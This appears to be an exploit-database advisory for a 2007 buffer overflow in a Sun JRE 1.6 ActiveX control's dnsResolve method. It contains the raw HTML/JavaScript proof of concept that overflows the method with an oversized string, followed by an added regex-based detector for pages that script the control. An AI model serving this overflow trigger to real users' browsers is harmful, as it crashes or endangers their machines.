Vendor: Java Runtime Environment
By: Yag Kohha
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Java Runtime Environment
Affected Version From: jre1.6.0_X
Affected Version To: jre1.6.0_X
Patch Exists: NO
Related CWE: Not provided
CPE: :j:java:runtime_environment:1.6.0_X
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC

The exploit triggers a buffer overflow in the isInstalled.dnsResolve function in Sun's JRE version 1.6.0_X. The code provided by Yag Kohha instantiates the ActiveX object with CLSID 5852F5ED-8BF4-11D4-A245-0080C6F74284, creates a string 'b', and appends it to itself in a loop until its length exceeds 512*512 characters. The overflow occurs when dnsResolve is called on that object with 'b' as the argument.

Mitigation:

Apply relevant patches and updates from Sun to fix the buffer overflow vulnerability.

Exploit-DB raw data:

<html>
<body>
<center>
Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC<br>
Bug founded and code released by Yag Kohha. <br>
Greetz to: <br>
Shinnai, Str0ke <br>

</center>
<object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284"
id="target"></OBJECT>
<SCRIPT language="javascript">
var b = 'XXXX';
while (b.length <= 512*512) b+=b;
target.dnsResolve(b);
</script>
</body>
</html>

# milw0rm.com [2007-09-19]
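
For triage of archived or proxied HTML, the following added example (not part of the original advisory or PoC) statically flags pages that instantiate the control by the CLSID shown above and call dnsResolve on it. The rule names, function names and sample pages are assumptions made for illustration, and the check is a regex heuristic rather than a full HTML/JavaScript parser.

```javascript
// Added example: static triage of HTML for scripting of the control in this PoC.
// The CLSID and method name come from the page; rule names are assumptions.
const CLSID = '5852F5ED-8BF4-11D4-A245-0080C6F74284';
const METHOD = 'dnsResolve';

// Return the id/name of every <object> tag whose classid is the flagged CLSID.
function findControlIds(html) {
  const ids = [];
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const cls = /\bclassid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})\}?/i.exec(tag);
    if (!cls || cls[1].toUpperCase() !== CLSID) continue;
    const id = /\b(?:id|name)\s*=\s*["']?([\w-]+)/i.exec(tag);
    ids.push(id ? id[1] : null);
  }
  return ids;
}

// Return findings for one page; an empty array means the control is not used.
function inspectPage(html) {
  const ids = findControlIds(html);
  if (ids.length === 0) return [];
  const findings = [{ rule: 'control-instantiated', detail: CLSID }];
  for (const id of ids.filter(Boolean)) {
    // Match case-insensitively so case variants of the method name are not missed.
    const call = new RegExp(`\\b${id}\\s*\\.\\s*${METHOD}\\s*\\(`, 'i');
    if (call.test(html)) findings.push({ rule: 'method-called', detail: `${id}.${METHOD}` });
  }
  // A variable appended to itself (x += x) is how the PoC grows its argument.
  const doubling = /\b([A-Za-z_$][\w$]*)\s*\+=\s*\1\b/.exec(html);
  if (doubling) findings.push({ rule: 'self-doubling-string', detail: doubling[0] });
  return findings;
}

// Constructed samples: the first mirrors the structure of the PoC on this page.
const SAMPLE_FLAGGED = `<html><body>
<object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284"
id="target"></object>
<script>var b = 'XXXX'; while (b.length <= 512*512) b+=b; target.dnsResolve(b);</script>
</body></html>`;
const SAMPLE_BENIGN = `<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="player"></object>
<script>player.play();</script>
</body></html>`;

for (const [name, html] of [['flagged', SAMPLE_FLAGGED], ['benign', SAMPLE_BENIGN]]) {
  console.log(name, JSON.stringify(inspectPage(html)));
}
```

The self-doubling rule is only evaluated on pages that already instantiate the flagged control, which keeps it from firing on unrelated scripts.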